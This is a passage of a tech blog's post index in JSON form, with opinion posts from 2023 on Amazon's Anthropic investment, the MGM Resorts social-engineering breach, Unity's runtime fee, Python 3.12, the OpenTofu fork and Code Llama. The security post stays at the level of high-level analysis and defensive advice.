Anthropic\u0026rsquo;s Claude models are already available through Bedrock, and this deeper partnership likely means tighter integration, better performance, and possibly early access to new model capabilities. This mirrors the model-as-a-service strategy OpenAI pioneered with Azure.\nFor developers building applications on top of LLMs, this is actually good news. The more competition there is among cloud providers to offer the best AI model access, the better the developer experience becomes. We\u0026rsquo;re seeing APIs become more standardised, pricing become more competitive, and tooling become more mature.\nWhat concerns me slightly is the consolidation aspect. When the three major cloud providers each have their preferred AI partner, it creates a kind of oligopoly in the foundation model space. If you\u0026rsquo;re building on AWS, you\u0026rsquo;ll naturally gravitate toward Claude through Bedrock. On Azure, it\u0026rsquo;s OpenAI. On Google Cloud, it\u0026rsquo;s Gemini. The switching costs aren\u0026rsquo;t just about the cloud infrastructure anymore — they\u0026rsquo;re about the model ecosystem.\nWhat About the Smaller Players? # The question I keep coming back to is: where does this leave the open-source AI community and smaller AI companies? Mistral, Cohere, AI21 Labs, and others are building impressive models, but they don\u0026rsquo;t have $4 billion backing from a hyperscaler.\nThere\u0026rsquo;s a real risk that the AI landscape bifurcates into the \u0026ldquo;cloud-backed giants\u0026rdquo; and everyone else. Open-source models like Llama 2 provide an alternative, but the compute required to train competitive models is becoming a genuine barrier to entry. You need either deep pockets or a cloud provider willing to foot the bill.\nThat said, the open-source community has a way of surprising everyone. 
The pace of innovation in techniques like quantisation, efficient fine-tuning with LoRA and QLoRA, and novel architectures means that smaller teams can sometimes punch well above their weight.\nThe Safety Angle # Anthropic positions itself as an AI safety company first, and their Constitutional AI approach is genuinely interesting from a technical perspective. Amazon\u0026rsquo;s investment presumably comes with some expectation that safety research continues to be a priority, which is a net positive for the industry.\nHaving a major cloud provider financially incentivised to support AI safety research creates an interesting dynamic. It suggests that \u0026ldquo;responsible AI\u0026rdquo; isn\u0026rsquo;t just a marketing buzzword anymore — it\u0026rsquo;s becoming a competitive differentiator that attracts serious capital.\nMy Take # I\u0026rsquo;ve watched enough technology cycles to know that the biggest investments don\u0026rsquo;t always pick the winners. But what Amazon\u0026rsquo;s Anthropic bet tells us is that the cloud providers see AI as the most important battleground of the next decade. This isn\u0026rsquo;t exploratory investment — it\u0026rsquo;s strategic positioning at massive scale.\nFor those of us building software, the practical implication is clear: AI capabilities are becoming a core feature of cloud platforms, not an add-on. If you\u0026rsquo;re not already thinking about how LLMs and foundation models fit into your architecture, now is the time to start experimenting.\nThe $4 billion question is whether this consolidation ultimately helps or hurts developers. My instinct says it\u0026rsquo;ll help in the short term — better tools, better APIs, lower prices — but we should keep a close eye on vendor lock-in as these ecosystems mature.\nThe AI race is no longer just about who has the best model. It\u0026rsquo;s about who has the best platform. 
And that\u0026rsquo;s a game the cloud providers know how to play.\n","date":"28 September 2023","externalUrl":null,"permalink":"/posts/230928-amazon-anthropic-investment/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Amazon pours $4 billion into Anthropic, signalling a major shift in how cloud providers are positioning themselves in the AI race.","title":"Amazon's $4 Billion Anthropic Bet — What It Means for Cloud AI","type":"posts"},{"content":"It\u0026rsquo;s been about ten days since MGM Resorts International confirmed a major cybersecurity incident that has disrupted operations across their properties. Slot machines went dark, hotel room keys stopped working, guests couldn\u0026rsquo;t check in electronically, and the company\u0026rsquo;s website was taken down. The estimated financial impact is staggering — analysts are projecting costs could exceed $100 million. And from what we know so far, it started with a phone call.\nThe attack has been attributed to a group known as Scattered Spider (also tracked as UNC3944), reportedly working with the ALPHV/BlackCat ransomware operation. According to multiple reports, the initial breach vector was a social engineering call to MGM\u0026rsquo;s IT help desk. An attacker, armed with information scraped from a LinkedIn profile, convinced a help desk employee to reset credentials. From that foothold, the attackers escalated privileges and eventually deployed ransomware across MGM\u0026rsquo;s systems.\nThe Social Engineering Problem We Keep Ignoring # Let me be direct: we spend billions on firewalls, endpoint detection, zero-trust architectures, and AI-powered threat detection, and then a 10-minute phone call brings down a $14 billion company. This isn\u0026rsquo;t a technology failure. It\u0026rsquo;s a systemic failure in how we think about security.\nSocial engineering isn\u0026rsquo;t new, and it isn\u0026rsquo;t exotic. Kevin Mitnick wrote about it decades ago. 
Yet here we are in 2023, and the help desk remains one of the softest entry points in most organizations. The reason is straightforward: help desks are optimized for customer service. Their KPIs are resolution time and customer satisfaction. Security friction is the enemy of those metrics.\nWhen an articulate caller provides enough personally identifiable information to seem legitimate and pressures for immediate access, the path of least resistance is to help them. That\u0026rsquo;s what help desk staff are trained to do — help. The attacker exploits not a bug in software, but a feature in human psychology.\nWhat\u0026rsquo;s particularly notable about the Scattered Spider group is their fluent English and social manipulation skills. Unlike many ransomware operations that rely primarily on technical exploitation, this group excels at the human element. They research targets thoroughly, craft convincing pretexts, and execute with the confidence of someone who belongs.\nThe Cloud and Identity Layer # Reports suggest that the attackers targeted MGM\u0026rsquo;s Okta environment and their Azure Active Directory, essentially going after the identity layer that ties everything together. This is the nightmare scenario for organizations that have centralized their identity management (which is the right thing to do, ironically).\nWhen your identity provider is compromised, the attacker doesn\u0026rsquo;t need individual exploits for each system. They have the keys to the kingdom. Every application that trusts your IdP, every service that uses SSO, every cloud resource protected by that identity layer — all of it becomes accessible.\nThis highlights a critical challenge in modern cloud architecture: centralized identity is both the best practice for security and a catastrophic single point of failure if breached. 
The answer isn\u0026rsquo;t to go back to fragmented authentication — it\u0026rsquo;s to layer additional protections around the identity infrastructure itself.\nMulti-factor authentication helps, but it\u0026rsquo;s not a complete solution. The Scattered Spider group has demonstrated the ability to bypass MFA through social engineering (convincing help desks to add new MFA devices) and MFA fatigue attacks (repeatedly triggering push notifications until a tired user approves one). Hardware security keys like YubiKeys are more resistant, but adoption rates remain low even in security-conscious organizations.\nThe Caesars Connection # It\u0026rsquo;s worth noting that Caesars Entertainment disclosed their own breach just days before the MGM incident became public. Caesars reportedly paid approximately $15 million in ransom — roughly half of the $30 million demanded. The same group is believed to be responsible.\nThe contrast in responses is instructive. Caesars paid the ransom, contained the damage relatively quietly, and resumed normal operations. MGM refused to pay, resulting in extended outages across their properties. There\u0026rsquo;s no universally right answer here — the FBI advises against paying ransoms, but when your entire operation is crippled and every day costs millions, the calculation gets complicated fast.\nFrom a technical standpoint, MGM\u0026rsquo;s extended recovery time suggests either insufficient backup and recovery infrastructure or that the attackers achieved deep enough access to compromise recovery mechanisms themselves. Sophisticated ransomware operations now specifically target backup systems, knowing that intact backups are the primary alternative to paying.\nWhat Organizations Should Actually Do # If you\u0026rsquo;re an engineering or security leader reading this, here\u0026rsquo;s what I\u0026rsquo;d prioritize:\nHarden your help desk procedures. Implement callback verification for sensitive operations. 
Require manager approval for credential resets on privileged accounts. Train help desk staff to recognize social engineering tactics and give them explicit permission to refuse requests that don\u0026rsquo;t pass verification, without fear of negative performance reviews.\nProtect the identity layer. Treat your IdP as critical infrastructure. Implement hardware MFA for administrative access. Monitor for anomalous authentication patterns. Have a specific incident response plan for identity infrastructure compromise.\nAssume breach in your architecture. Implement network segmentation so that compromising one system doesn\u0026rsquo;t grant access to everything. Use just-in-time access provisioning rather than standing privileges. Monitor lateral movement indicators.\nTest your recovery. Regular disaster recovery testing isn\u0026rsquo;t just about checking a compliance box. Can you actually restore operations if your primary systems and backups are simultaneously compromised? How long does it take? What\u0026rsquo;s the manual fallback?\nMy Take # I\u0026rsquo;ve been in this industry long enough to see the same fundamental patterns repeat across decades of increasingly sophisticated technology. The MGM breach is, at its core, the same class of attack that has worked since the dawn of computing: fool a human, get access, escalate, profit.\nWhat frustrates me is that social engineering remains the neglected stepchild of security investment. Organizations spend millions on SIEM platforms and endpoint detection but treat security awareness training as an annual checkbox exercise. The attacker community has clearly figured out that the human layer is the most cost-effective attack surface. Our defensive investments should reflect that reality.\nThe MGM incident will generate months of analysis, regulatory scrutiny, and vendor marketing campaigns for various security products. 
But if it doesn\u0026rsquo;t fundamentally change how organizations think about help desk security and identity protection, then we\u0026rsquo;ll be writing about the next version of this story within the year.\nDon\u0026rsquo;t wait for the case study. Audit your help desk procedures this week. Test your identity infrastructure resilience this month. The attackers are already researching their next target.\n","date":"21 September 2023","externalUrl":null,"permalink":"/posts/230921-mgm-resorts-social-engineering-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The MGM Resorts cyberattack that started with a phone call is a stark reminder that the most sophisticated defenses can be undone by human vulnerability.","title":"The MGM Resorts Hack — A $100M Lesson in Social Engineering","type":"posts"},{"content":"On Tuesday, Unity Technologies announced a new \u0026ldquo;Unity Runtime Fee\u0026rdquo; — a charge that kicks in when games built with Unity exceed certain install thresholds. Starting January 1, 2024, developers using Unity Personal and Unity Pro would owe Unity between $0.01 and $0.20 per install after crossing revenue and install count thresholds. The backlash has been immediate, severe, and entirely predictable. As someone who has watched platform dynamics play out across many domains over three decades, this is a masterclass in how to destroy developer trust.\nThe Policy and Why It\u0026rsquo;s Problematic # The details matter here, and they\u0026rsquo;re worse than the headline suggests. Unity plans to track installs using their own proprietary data model — not sales, not revenue, but installs. That means reinstalls count. Installing on a new device counts. 
If your game goes free-to-play and gets millions of installs but monetizes poorly, you could owe Unity more than you earn.\nThe thresholds vary by tier: Unity Personal users would start paying after $200K in trailing twelve-month revenue and 200K lifetime installs. Unity Pro and Enterprise have higher thresholds but the per-install fees still apply. For successful indie games, the math gets alarming quickly. A game with 10 million installs could owe Unity hundreds of thousands of dollars — retroactively, for games already built and shipped under the previous licensing terms.\nThat retroactive application is perhaps the most egregious aspect. Developers made business decisions — chose an engine, built their game, signed publishing deals — based on Unity\u0026rsquo;s existing pricing model. Changing the terms after the fact, for software already in the market, violates a fundamental principle of platform trust.\nThe Broader Platform Lesson # This isn\u0026rsquo;t just a game development story. It\u0026rsquo;s a cautionary tale for every developer who builds on a proprietary platform. The pattern is familiar: a platform grows by being developer-friendly, achieves market dominance, then changes the terms to extract more value from its captive user base.\nWe\u0026rsquo;ve seen variants of this across the tech industry. Oracle\u0026rsquo;s aggressive licensing changes after acquiring Sun. Docker\u0026rsquo;s pricing adjustments that caught many organizations off guard. Twitter\u0026rsquo;s API pricing that killed an ecosystem of third-party apps. The common thread is that platforms eventually optimize for revenue extraction over ecosystem health.\nWhat makes Unity\u0026rsquo;s move particularly striking is the timing and severity. The company has been struggling financially — their stock is down significantly from its highs, they\u0026rsquo;ve had layoffs, and the merger with ironSource has been controversial. 
This fee structure looks like a desperate attempt to find new revenue, implemented by people who don\u0026rsquo;t understand (or don\u0026rsquo;t care about) the downstream effects on their developer community.\nWhat Developers Are Doing # The response from the Unity developer community has been extraordinary. Multiple game studios have publicly stated they\u0026rsquo;re evaluating alternatives. Cult of the Lamb\u0026rsquo;s developer Massive Monster, Innersloth (Among Us), and Aggro Crab (Going Under) have all spoken out. Some developers are threatening to pull their games from storefronts rather than pay the fee. Others are already beginning the painful process of evaluating engine switches.\nGodot Engine, the open-source game engine, has seen an enormous surge in interest. Their Twitter account gained tens of thousands of followers in days. Unreal Engine, Epic\u0026rsquo;s proprietary but more predictably priced alternative, is also getting renewed attention.\nBut switching engines isn\u0026rsquo;t like switching text editors. Game engines are deeply embedded in a development team\u0026rsquo;s workflow, tools, expertise, and existing codebases. A mid-project engine switch is essentially starting over. Even for new projects, the switching cost includes retraining your team, rebuilding your tool pipeline, and accepting a productivity dip that could last months or years.\nThis is exactly the kind of lock-in that makes platform changes so insidious. The cost of leaving is so high that many developers will stay and absorb the fee, even if they resent it. Unity is counting on that calculus.\nThe Open Source Alternative # The surge of interest in Godot Engine deserves special attention. Godot has been steadily improving for years, and its 4.0 release earlier this year brought significant graphics and performance improvements. 
It\u0026rsquo;s MIT-licensed, meaning it\u0026rsquo;s free to use, free to modify, and free from the kind of licensing ambush Unity just pulled.\nCould Godot replace Unity for all use cases today? Honestly, no. Unity\u0026rsquo;s ecosystem of assets, its mobile deployment pipeline, and its tooling maturity still have advantages for many projects. But the gap has been narrowing, and Unity just gave Godot the biggest marketing boost it could have asked for.\nI\u0026rsquo;ve always been an advocate for open-source infrastructure in development workflows. Not because proprietary tools are inherently bad — they often provide excellent experiences — but because open-source tools can\u0026rsquo;t pull the rug out from under you. When your business depends on a tool, the license under which you use that tool is a strategic concern, not just a legal technicality.\nMy Take # I think Unity will walk this back. The backlash is too severe, the developer exodus too visible, and the PR damage too deep for them to push through the current proposal unchanged. We\u0026rsquo;ll likely see revised thresholds, exemptions for existing games, and softer language within weeks.\nBut even a full reversal won\u0026rsquo;t fully repair the trust. The message has been sent: Unity\u0026rsquo;s leadership is willing to retroactively change terms to extract revenue from their developer base. Even if this particular policy is softened, developers will — and should — factor that willingness into their platform decisions going forward.\nThe lesson for all of us, whether we build games or web apps or cloud services, is clear: be thoughtful about your dependencies. Evaluate not just the technical capabilities of your platforms, but the business incentives of the companies behind them. And when viable open-source alternatives exist, give them serious consideration. 
The price you\u0026rsquo;re not paying today might be the leverage you\u0026rsquo;ll wish you had tomorrow.\nI don\u0026rsquo;t build games, but I recognize the dynamic. Every time I choose a framework, a cloud provider, or a development tool, I\u0026rsquo;m making a bet on the future behavior of the organization behind it. Unity just reminded all of us why that bet matters.\n","date":"14 September 2023","externalUrl":null,"permalink":"/posts/230914-unity-runtime-fee-developer-trust/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Unity’s announcement of a per-install runtime fee has sent shockwaves through the game development community, and the lessons extend far beyond gaming.","title":"Unity's Runtime Fee — When a Platform Betrays Developer Trust","type":"posts"},{"content":"Python 3.12 is now at release candidate 2, and the final release is expected in October. I\u0026rsquo;ve been testing it against some of my projects, and I\u0026rsquo;m genuinely impressed. This isn\u0026rsquo;t a flashy release with headline-grabbing new syntax — it\u0026rsquo;s a disciplined, engineering-focused update that addresses real pain points. After thirty years of watching programming languages evolve, I can tell you: these are the releases that matter most.\nThe Performance Story Continues # The Faster CPython project, led by Mark Shannon and supported by Microsoft, is delivering on its promises. Python 3.11 gave us a 10-25% speedup, and 3.12 continues that trajectory with additional optimizations to the interpreter loop and object creation paths.\nThe most significant performance work in 3.12 is the implementation of PEP 669 — Low Impact Monitoring for CPython. This overhauls how debugging and profiling tools hook into the interpreter. Previously, having a debugger or profiler attached would slow down all code execution, even code that wasn\u0026rsquo;t being monitored. 
With PEP 669, monitoring has near-zero overhead for code that isn\u0026rsquo;t being actively watched.\nIf you\u0026rsquo;ve ever noticed your test suite running significantly slower under coverage.py, or your application getting sluggish when a profiler is attached, this is directly relevant. The new monitoring API means tools can be more surgical about what they instrument, and the interpreter doesn\u0026rsquo;t pay a tax just because a monitoring tool is loaded.\nFor those of us who routinely profile production systems, this is a meaningful quality-of-life improvement. I\u0026rsquo;ve always been cautious about running profilers in production precisely because of the performance overhead. PEP 669 could change that calculus.\nBetter Error Messages, Better Developer Experience # Python 3.10 introduced better error messages, and 3.11 expanded on them with fine-grained exception locations. Python 3.12 takes another step with improved suggestions for common mistakes. The interpreter now provides more helpful \u0026ldquo;did you mean?\u0026rdquo; suggestions for NameError, ImportError, and SyntaxError.\nFor example, if you type import datetime and then reference datetime.datatime.now(), the error message will now suggest datetime.datetime. These seem like small things, but they add up. I mentor junior developers regularly, and I can tell you that cryptic error messages are one of the biggest sources of frustration for people learning the language. Every improvement here lowers the barrier to entry.\nInvalid escape sequences in strings now raise a SyntaxWarning instead of a DeprecationWarning, which is a signal that they will become errors in a future release. If you have \u0026quot;\\d+\u0026quot; in your regex strings without using raw strings (r\u0026quot;\\d+\u0026quot;), now\u0026rsquo;s the time to clean those up.\nType System Improvements # Python\u0026rsquo;s gradual typing story continues to mature with 3.12. 
The headline feature is PEP 695, which introduces a new, cleaner syntax for type parameters. Instead of the somewhat clunky:\nfrom typing import TypeVar T = TypeVar(\u0026#39;T\u0026#39;) def first(l: list[T]) -\u0026gt; T: return l[0] You can now write:\ndef first[T](l: list[T]) -\u0026gt; T: return l[0] This syntax also works for classes and type aliases:\ntype Vector[T] = list[T] class Stack[T]: def push(self, item: T) -\u0026gt; None: ... def pop(self) -\u0026gt; T: ... The type statement for type aliases (PEP 695) is cleaner and more intuitive than TypeAlias. If you\u0026rsquo;ve worked with generics in TypeScript, Rust, or Java, this syntax will feel immediately familiar. Python\u0026rsquo;s type system has been evolving rapidly, and this release makes it feel substantially more natural.\nThe No-GIL Future Takes Shape # Perhaps the most architecturally significant work in 3.12 is the foundation for PEP 684 — per-interpreter GIL. This allows multiple Python interpreters within the same process to have their own Global Interpreter Lock, enabling true parallelism for certain workloads. This continues the performance focus that began with Faster CPython in 3.11.\nThis is distinct from the full \u0026ldquo;no-GIL\u0026rdquo; proposal (PEP 703), which Sam Gross has been developing and the Python Steering Council is evaluating. But PEP 684 is an important stepping stone. It enables parallelism through sub-interpreters without the ecosystem disruption of removing the GIL entirely.\nFor most Python developers, the GIL has been a known limitation that you work around with multiprocessing or async I/O. The per-interpreter GIL won\u0026rsquo;t change your daily workflow immediately, but it\u0026rsquo;s laying groundwork for a future where CPU-bound Python code can truly utilize multiple cores without the overhead of separate processes.\nI\u0026rsquo;ve been following the GIL discussion for years, and what impresses me about the current approach is its pragmatism. 
Rather than a revolutionary change that breaks the entire C extension ecosystem, the CPython team is taking an incremental path. That\u0026rsquo;s the kind of engineering discipline that keeps a language healthy for decades.\nPractical Migration Considerations # If you\u0026rsquo;re planning to upgrade to 3.12, here are the things I\u0026rsquo;d watch for:\nDeprecated removals: Several long-deprecated modules have been removed, including distutils (use setuptools instead), asynchat, asyncore, and imp. If you\u0026rsquo;re maintaining older codebases, audit your imports before upgrading.\nString escaping: The strengthened warnings about invalid escape sequences mean your CI might suddenly light up with warnings. Address them now rather than waiting for them to become errors.\nf-string changes: F-strings in 3.12 have been reimplemented to remove several previous limitations. You can now nest quotes freely, use backslashes, and even include comments in multi-line f-strings. This is mostly additive, but if you had workarounds for the old limitations, you can simplify your code.\nTyping: If you adopt the new type parameter syntax, your code will require 3.12+ to run. For libraries that need to support older versions, you\u0026rsquo;ll want to stick with the TypeVar approach for now.\nMy Take # Python 3.12 is a release that makes me optimistic about the language\u0026rsquo;s trajectory. After the Python 2 EOL transition and years of hearing \u0026ldquo;Python is too slow\u0026rdquo; and \u0026ldquo;the GIL makes Python useless for parallel work,\u0026rdquo; the CPython team is systematically addressing these criticisms without breaking the ecosystem.\nThe performance improvements are real and cumulative. The developer experience keeps getting better. The type system is maturing into something genuinely useful rather than just a bolted-on afterthought. 
And the GIL work suggests a future where Python\u0026rsquo;s concurrency story is competitive with languages that have always had it easier.\nIf you haven\u0026rsquo;t tested your projects against the release candidate, I\u0026rsquo;d encourage you to try it. The migration is typically smooth, and the benefits are tangible. Python remains one of the most productive languages for a huge range of tasks, and 3.12 makes it measurably better.\n","date":"7 September 2023","externalUrl":null,"permalink":"/posts/230907-python-312-what-developers-need-to-know/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.12 is in release candidate stage with major performance improvements, better error messages, and the foundations of a no-GIL future.","title":"Python 3.12 — A Performance-Focused Release Worth Getting Excited About","type":"posts"},{"content":"The infrastructure-as-code world is experiencing its biggest upheaval in years. Two weeks ago, HashiCorp announced they were moving Terraform (along with all their other products) from the Mozilla Public License 2.0 to the Business Source License (BSL) 1.1. The community response was swift and decisive: a coalition of companies and contributors launched the OpenTofu manifesto, pledging to maintain a truly open-source fork of Terraform. As someone who\u0026rsquo;s been deploying infrastructure with Terraform since its early days, I have thoughts.\nWhat the BSL Change Actually Means # Let\u0026rsquo;s cut through the noise and understand what the BSL license actually restricts. Under the new terms, you can still use Terraform freely for internal purposes. You can view, modify, and even redistribute the code. What you can\u0026rsquo;t do is offer a competing commercial product that embeds or is built on top of Terraform. 
The BSL converts to the open-source MPL 2.0 license after four years.\nOn paper, this sounds reasonable — HashiCorp is protecting their business from cloud providers who were building managed Terraform services without contributing back. And they have a point: the \u0026ldquo;open source commoditization\u0026rdquo; playbook that AWS and others have run against Redis, Elasticsearch, and MongoDB is well-documented.\nBut the devil is in the details. The BSL\u0026rsquo;s competitive use restriction is intentionally vague. What counts as a \u0026ldquo;competing\u0026rdquo; product? If I build an internal platform that manages Terraform runs for my organization, am I competing with Terraform Cloud? If a consultancy builds tooling around Terraform for their clients, is that competitive? HashiCorp says they\u0026rsquo;ll clarify through an FAQ, but legal ambiguity is itself a problem when you\u0026rsquo;re choosing foundational infrastructure.\nWhy OpenTofu Matters # The OpenTofu initiative — initially called OpenTF — isn\u0026rsquo;t just an angry reaction. It\u0026rsquo;s backed by serious players: Gruntwork, Spacelift, env0, Scalr, and numerous other companies that have built their businesses around the Terraform ecosystem. The Linux Foundation is involved in governance discussions. As of this week, the manifesto has gathered hundreds of signatures from companies and over a thousand individual contributors.\nThe fork will be based on Terraform 1.5.x, the last version released under the MPL. The stated goal is to keep the project community-driven, vendor-neutral, and under a genuinely open-source license.\nWhat gives me cautious optimism is that the core technical work of Terraform isn\u0026rsquo;t magic — it\u0026rsquo;s excellent engineering, but it\u0026rsquo;s engineering that a motivated community can maintain and extend. The infrastructure-as-code landscape continues to evolve, as shown by later consolidation around infrastructure tools. 
The provider ecosystem, which is arguably Terraform\u0026rsquo;s greatest strength, is largely community-maintained already. Most providers are developed by the cloud vendors themselves or by community contributors, not by HashiCorp employees.\nLessons from History # I\u0026rsquo;ve seen this pattern before. When Oracle acquired Sun and the MySQL community got nervous, MariaDB was forked and has thrived as an independent project. When Elasticsearch moved to a non-open-source license, the OpenSearch fork emerged and has gained substantial adoption. CentOS Stream\u0026rsquo;s shift away from being a stable RHEL rebuild gave us Rocky Linux and AlmaLinux.\nThe pattern is clear: when a widely-adopted open-source project changes its social contract with the community, viable forks emerge. But not all forks succeed. The ones that thrive have strong governance, serious backing, and enough engineering talent to keep up with the pace of development.\nOpenTofu seems to be checking those boxes. The corporate backing provides resources, the Linux Foundation involvement suggests mature governance, and the contributor pool is deep enough. But execution will determine everything. Maintaining compatibility, keeping the provider ecosystem working, and building the kind of boring reliability that infrastructure tools require — that\u0026rsquo;s the hard part.\nWhat This Means for Your Terraform Deployments # If you\u0026rsquo;re running Terraform in production today — and based on the surveys I\u0026rsquo;ve seen, about 60% of organizations doing infrastructure-as-code are — you don\u0026rsquo;t need to panic. The BSL doesn\u0026rsquo;t affect your ability to use Terraform internally. Your existing workflows, state files, and modules will continue to work.\nBut if you\u0026rsquo;re making longer-term strategic decisions about your infrastructure-as-code tooling, this is worth paying attention to. 
A few questions I\u0026rsquo;d be asking:\nAre you dependent on the open-source ecosystem? If your Terraform setup relies heavily on community modules and third-party tooling, those ecosystem participants may gradually shift their focus to OpenTofu. This isn\u0026rsquo;t a tomorrow problem, but it could become a next-year problem.\nAre you building tools on top of Terraform? If your platform team has built internal tooling that wraps or extends Terraform, the BSL\u0026rsquo;s competitive use clause creates legal ambiguity you should probably discuss with your counsel.\nHow do you feel about vendor lock-in? The BSL means HashiCorp can, at any point, steer Terraform\u0026rsquo;s development to favor their commercial products. That\u0026rsquo;s their right, but it\u0026rsquo;s a strategic consideration for organizations that prefer truly neutral tools.\nFor my own projects, I\u0026rsquo;m watching OpenTofu closely. I won\u0026rsquo;t switch tomorrow — stability matters more than ideology when you\u0026rsquo;re managing production infrastructure. But I\u0026rsquo;m mentally preparing for the possibility and keeping my configurations as portable as possible.\nMy Take # I understand HashiCorp\u0026rsquo;s frustration. Building and maintaining open-source infrastructure is expensive, and watching cloud providers monetize your work without contributing back is genuinely unfair. But I think the BSL was the wrong solution. It breaks trust with the community that helped build Terraform into the standard it is today.\nThe right approach, in my view, would have been stronger copyleft licensing or working with the cloud providers on contribution agreements. The nuclear option of changing the license on a project with this much community investment was always going to trigger exactly this response. 
This dynamic mirrors broader concerns about open source governance and community relationships.\nWhat I hope comes out of this is a healthy OpenTofu project that maintains the spirit of what made Terraform great, and a HashiCorp that competes on the strength of their commercial offerings rather than on license restrictions. The infrastructure-as-code space benefits from competition, and having both Terraform and OpenTofu pushing each other forward is better than a monopoly under either license model.\nThe next few months will be telling. If OpenTofu can ship a credible 1.6 release and maintain provider compatibility, we might be looking at the most significant fork in the DevOps ecosystem since Jenkins split from Hudson. The broader platform engineering evolution will be shaped by how these infrastructure-as-code tools mature. Stay tuned.\n","date":"31 August 2023","externalUrl":null,"permalink":"/posts/230831-opentofu-terraform-fork-open-source/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"HashiCorp’s switch to the Business Source License has triggered a community fork of Terraform called OpenTofu, and the implications for infrastructure-as-code are enormous.","title":"OpenTofu — The Community Fights Back Against Terraform's License Change","type":"posts"},{"content":"Today Meta released Code Llama, a family of large language models specifically fine-tuned for code generation, and I think this deserves more attention than it\u0026rsquo;s getting. Built on top of Llama 2, these models come in three sizes — 7B, 13B, and 34B parameters — and they\u0026rsquo;re available under a permissive license that allows both research and commercial use. In a landscape where GitHub Copilot and ChatGPT have dominated the AI coding conversation, having a truly open-source alternative is a significant shift.\nWhat Code Llama Actually Brings to the Table # Let\u0026rsquo;s be clear about what we\u0026rsquo;re looking at. 
Code Llama isn\u0026rsquo;t just \u0026ldquo;Llama 2 but for code.\u0026rdquo; Meta trained these models on an additional 500 billion tokens of code-heavy data, and then created specialized variants. The base Code Llama handles general code tasks, Code Llama - Instruct follows natural language instructions, and Code Llama - Python is optimized specifically for Python development.\nThe 34B parameter model reportedly scores 53.7% on HumanEval, which puts it in competitive territory with GPT-3.5 for code generation tasks. The smaller 7B and 13B models are particularly interesting because they can run on consumer hardware — I\u0026rsquo;ve already seen people in the community getting the 7B model running on M1 MacBooks with reasonable inference speeds.\nWhat makes this practically useful is the context window. Code Llama supports up to 100,000 tokens of context, which means it can process and reason about substantial codebases. If you\u0026rsquo;ve ever been frustrated by Copilot losing track of your project structure mid-suggestion, that context length matters.\nThe Open Source Angle Changes Everything # Here\u0026rsquo;s where I get genuinely excited. For the past year, the AI coding assistant space has been effectively a closed shop. Copilot runs on OpenAI\u0026rsquo;s models, Amazon CodeWhisperer uses proprietary technology, and Tabnine recently moved toward larger proprietary models. If you wanted a serious AI coding assistant, you were renting access to someone else\u0026rsquo;s infrastructure.\nCode Llama changes that calculus. With models you can download, fine-tune, and host yourself, organizations now have a path to AI-assisted development that doesn\u0026rsquo;t require sending their proprietary code to a third-party API. This addresses the fundamental tension between AI capabilities and data security that enterprises must balance. 
I\u0026rsquo;ve spoken with several CTOs over the past months who were interested in AI coding tools but couldn\u0026rsquo;t get past the security review — their compliance teams wouldn\u0026rsquo;t approve sending source code to external services. Self-hosted Code Llama could be exactly what these organizations need.\nThe fine-tuning aspect is equally important. Imagine training Code Llama on your organization\u0026rsquo;s specific codebase, coding standards, and internal libraries. A model that knows your patterns, your frameworks, and your conventions could be dramatically more useful than a general-purpose coding assistant.\nPractical Considerations and Limitations # Before anyone rushes to replace their Copilot subscription, let\u0026rsquo;s be realistic about the current state. The 7B model, while runnable on consumer hardware, is noticeably less capable than the 34B variant. And even the 34B model, while impressive, still lags behind GPT-4 on complex reasoning tasks that involve understanding broader software architecture.\nRunning the 34B model requires serious GPU resources — we\u0026rsquo;re talking about at least an A100 or equivalent for reasonable inference speeds in a production setting. That\u0026rsquo;s not cheap, and the operational complexity of hosting and maintaining your own ML infrastructure shouldn\u0026rsquo;t be underestimated. I\u0026rsquo;ve run enough self-hosted services over the years to know that the total cost of ownership often surprises people.\nThere\u0026rsquo;s also the question of tooling. Copilot\u0026rsquo;s strength isn\u0026rsquo;t just the model — it\u0026rsquo;s the deep VS Code integration, the seamless inline suggestions, and the context-gathering that happens behind the scenes. 
The Code Llama models are just models; building the IDE integration, the prompt engineering pipeline, and the serving infrastructure is substantial engineering work.\nThe Competitive Dynamics Are Getting Interesting # Meta\u0026rsquo;s strategy here is fascinating from a business perspective. They don\u0026rsquo;t sell AI coding tools, so giving away competitive models costs them nothing in direct revenue while potentially undermining competitors who do. It\u0026rsquo;s the same playbook they ran with React — give away infrastructure to commoditize the complement.\nFor GitHub and Microsoft, this creates an interesting pressure. If open-source alternatives get good enough, the willingness to pay $19/month for Copilot decreases. Microsoft will likely need to keep Copilot meaningfully ahead to justify the subscription, which means the pace of improvement benefits everyone.\nI\u0026rsquo;m also watching to see how the broader open-source AI community builds on this. The Llama 2 release spawned an incredible ecosystem of fine-tunes, quantizations, and tools in just a few weeks. I expect we\u0026rsquo;ll see specialized Code Llama variants for specific languages, frameworks, and use cases within a month.\nMy Take # I\u0026rsquo;ve been writing code professionally for three decades, and I\u0026rsquo;ve watched many \u0026ldquo;this changes everything\u0026rdquo; moments come and go. Code Llama isn\u0026rsquo;t going to replace human developers — let\u0026rsquo;s get that out of the way. But it represents something I think is genuinely important: the democratization of AI coding assistance.\nThe fact that any developer, any company, any university can now download a competitive code generation model and build on it is powerful. It means the benefits of AI-assisted development won\u0026rsquo;t be locked behind corporate subscriptions. It means researchers can study and improve these systems openly. 
And it means the competitive pressure will drive everyone — open source and commercial — to build better tools.\nIf you\u0026rsquo;re a developer who hasn\u0026rsquo;t yet explored AI coding assistants, Code Llama might be a good place to start. No subscription, no API keys, no code leaving your machine. Just download, run, and experiment. That\u0026rsquo;s how open source should work.\nThis is the kind of release that reshapes the landscape not through a single dramatic moment, but through a thousand small experiments that follow. I\u0026rsquo;m looking forward to seeing what people build.\n","date":"24 August 2023","externalUrl":null,"permalink":"/posts/230824-code-llama-open-source-code-generation/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta releases Code Llama, a family of open-source code generation models, and it might just change the dynamics of AI-assisted development.","title":"Code Llama — Meta's Open Source Bet on AI-Assisted Coding","type":"posts"},{"content":"Python 3.12.0rc1 landed this week, marking the final stretch before the October release. Having tracked Python\u0026rsquo;s evolution for most of my career, this release feels like a particularly significant one. Not because of any single headline feature, but because several long-running efforts are converging in ways that matter for real-world Python development.\nLet me walk through what\u0026rsquo;s actually changing and why it matters for your projects.\nPer-Interpreter 